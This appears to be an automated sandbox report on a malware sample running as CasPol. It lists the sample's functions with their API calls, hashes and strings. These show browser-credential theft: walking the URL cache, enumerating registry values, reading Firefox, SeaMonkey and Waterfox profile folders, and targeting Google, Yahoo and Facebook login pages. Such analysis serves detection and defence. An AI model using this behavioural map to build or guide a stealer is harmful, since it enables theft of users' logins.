                                                                                                                                                                                  • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 639 40e1e8-40e1fa call 406e8f 636->639 643 40e270-40e27d call 406b53 639->643 644 40e1fc-40e219 call 40dd50 * 2 639->644 643->639 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 652 40e291-40e294 call 40aa04 649->652 653 40e288-40e290 free 649->653 652->637 653->652 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                                                                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 716 41837f-4183bf 717 4183c1-4183cc call 418197 716->717 718 4183dc-4183ec call 418160 716->718 723 4183d2-4183d8 717->723 724 418517-41851d 717->724 725 4183f6-41840b 718->725 726 4183ee-4183f1 718->726 723->718 727 418417-418423 725->727 728 41840d-418415 725->728 726->724 729 418427-418442 call 41739b 727->729 728->729 732 418444-41845d CreateFileW 729->732 733 41845f-418475 CreateFileA 729->733 734 418477-41847c 732->734 733->734 735 4184c2-4184c7 734->735 736 41847e-418495 GetLastError free 734->736 739 4184d5-418501 memset call 418758 735->739 740 4184c9-4184d3 735->740 737 4184b5-4184c0 call 444706 736->737 738 418497-4184b3 call 41837f 736->738 737->724 738->724 746 418506-418515 free 739->746 740->739 746->724
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 747 40d134-40d13b 748 40d142-40d14e 747->748 749 40d13d call 40d092 747->749 750 40d160 748->750 751 40d150-40d159 748->751 749->748 755 40d162-40d164 750->755 753 40d15b-40d15e 751->753 754 40d18d-40d19f 751->754 753->750 753->751 754->755 756 40d295 755->756 757 40d16a-40d170 755->757 760 40d297-40d299 756->760 758 40d1a1-40d1a9 757->758 759 40d172-40d18b GetModuleHandleW 757->759 762 40d1f8-40d206 call 40d29a 758->762 763 40d1ab-40d1cb wcscpy call 40d626 758->763 761 40d20b-40d214 LoadStringW 759->761 764 40d216 761->764 762->761 771 40d1cd-40d1dd wcslen 763->771 772 40d1df-40d1f6 GetModuleHandleW 763->772 767 40d218-40d227 764->767 768 40d28e-40d293 764->768 767->768 770 40d229-40d235 767->770 768->760 770->768 773 40d237-40d28c memcpy 770->773 771->764 771->772 772->761 773->756 773->768
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                  • String ID: strings
                                                                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
